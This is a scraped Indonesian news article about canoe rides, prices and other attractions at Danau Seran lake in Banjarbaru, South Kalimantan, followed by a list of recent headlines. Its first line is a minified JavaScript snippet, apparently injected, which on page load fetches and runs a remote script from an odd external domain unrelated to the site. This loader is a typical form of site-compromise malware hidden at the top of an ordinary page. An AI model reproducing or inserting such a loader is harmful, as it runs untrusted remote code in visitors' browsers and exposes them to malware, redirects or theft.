(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Naik Kano di Danau Seran Banjarbaru, Rekomendasi View Spot Foto Estetik


KANALKALIMANTAN.COM, BANJARBARU – Pencinta wisata alam wajib menjajal objek wisata satu ini, yaitu wahana kano di wisata Danau Seran, Kelurahan Palam, Kecamatan Cempaka, Kota Banjarbaru, Kalimantan Selatan (Kalsel).

Sesuai namanya, obyek wisata ini menawarkan pengalaman menyusuri danau dengan menaiki perahu kano.

Wahana perahu jenis kano di Danau Seran kini menjadi tempat favorit untuk liburan akhir pekan. Wahana bermain air belum banyak di ketahui oleh masyarakat luas.

Wati, pengelola objek wisata Danau Seran mengatakan, wahana wisata kano baru buka setelah libur Lebaran lalu.

“Tapi saat ini banyak masyarakat yang ke sini untuk naik kano ini, salah satu rekomendasi,” ujar Wati kepada Kanalkalimantan.com.

Mengayuh kano di tengah danau menawarkan pemandangan yang indah dan juga dengan air yang tenang dan jernih, namun tidak terlalu dalam, jadi wisata tersebut aman ditambah dengan pengawasan penjaga.

Wati, salah satu pengelola wahana di Danau Seran Banjarbaru. Foto : wanda

Wati menjelaskan, untuk dapat menaiki kano tersebut, pengunjung harus terlebih dahulu menyebrangi danau menggunakan kelotok seharga Rp5 ribu (harga sudah termasuk ongkos pulang pergi).

Kemudian di seberang danau, pengunjung dapat menikmati kano tersebut dengan membayar seharga Rp35 ribu untuk 20 menit menaikinya.

“Penyebrangan satu orang pulang pergi Rp5 ribu dan di seberang sana pengunjung dapat naik perahu kano Rp35 ribu selama 20 menit,” sebut dia.

Tempat tersebut memadukan antara danau dan hutan yang cukup rindang menjadikan suasana yang ada di sekitar kawasan wisata alam menjadi lebih menyejukan.

Tak hanya kano, wahana lain yang dapat dinikmati di Danau Seran ada kolam renang untuk dewasa dan anak yang sudah dilengkapi pelampung.

Pengunjung bisa sepuasnya berenang di kolam tersebut dengan membayar Rp10 ribu saja. Kemudian ada perahu bebek dengan harga Rp25 ribu 30 menit penyewaan.

“Di seberang sana juga ada jet ski, bebek-bebekan, kano, sampai gazebo yang dapat dipakai gratis kalau memang ada acara,” jelas Wati.

Sementara itu, diakui M Azwadin salah satu pengunjung, ini adalah kunjungan keli kedua ke wisata Danau Seran ini.

“Saya dari Kemuning Banjarbaru ke sini untuk kedua kalinya, pertama kali tahun 2018, waktu itu belum ada kano. Sekarang ramai tempat ini, kami jadi ke sini lagi,” ujar M Azwadin.

Dia mengatakan, daya tarik wisata kano Danau Seran adalah menyusuri danau sembari menikmati panorama alam yang indah.

Pengunjung dapat menjadikan wahana kano menjadi spot foto yang membuat estetik.

“Danaunya kita lihat kaya cermin kita bisa melihat dasar airnya, sehingga bagus menjadi spot-spot foto estetik, bahkan bisa untuk prewed,” ungkap dia.

Meski begitu, kata dia akan lebih bagus lagi jika pohon-pohon di sekitar sana lebih rindang lagi dan tidak banyak daun yang berguguran serta pohon yang ditebang.

“Pohon-pohon di sini bagus untuk spot berfoto, seperti pohon-pohon pinus, wahana-wahana di sini sudah cukup ramai untuk dikunjungi,” tuntasnya. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Jemaah Haji Asal Tabalong Wafat Jelang Wukuf Arafah

KANALKALIMANTAN.COM, BANJARMASIN - Kabar duka datang dari Kloter 18 Haji Embarkasi Banjarmasin, seorang jemaah haji… Read More

9 jam ago

Harga Daging Sapi Stabil di Pasar Bauntung Banjarbaru, Ayam Ras Naik Capai Rp31 Ribu per Kg

KANALKALIMANTAN.COM, BANJARBARU - Lapak penjual daging sapi di Pasar Bauntung Kota Banjarbaru Kalimantan Selatan (Kalsel)… Read More

13 jam ago

Kerukunan Mahasiswa HSU Banjarmasin Dikukuhkan, Ini Pesan Ketua DPRD HSU

KANALKALIMANTAN.COM, AMUNTAI - Dewan Perwakilan Rakyat Daerah (DPRD) Kabupaten Hulu Sungai Utara (HSU) selalu memberikan… Read More

14 jam ago

203 Jemaah Sidrap Ditangkap di Jeddah, Pakai Visa Ziarah Bertahan untuk Berhaji

KANALKALIMANTAN.COM, JEDDAH - Tim Pengawas (Timwas) Haji DPR meminta jemaah calon haji Indonesia yang tidak… Read More

17 jam ago

KPU Banjar Launching Pilkada Kabupaten Banjar 2024

KANALKALIMANTAN.COM, MARTAPURA - Komisi Pemilihan Umum (KPU) Kabupaten Banjar meluncurkan Pemilihan Bupati dan Wakil Bupati… Read More

17 jam ago

Bakti Religi Polsek Banjarbaru Utara, Bersihkan Masjid Sambut Hari Bhayangkara ke-78

KANALKALIMANTAN.COM, BANJARBARU - Memperingati Hari Bhayangkara ke-78, jajaran Kepolisian Sektor (Polsek) Banjarbaru Utara melaksanakan kegiatan… Read More

19 jam ago

This website uses cookies.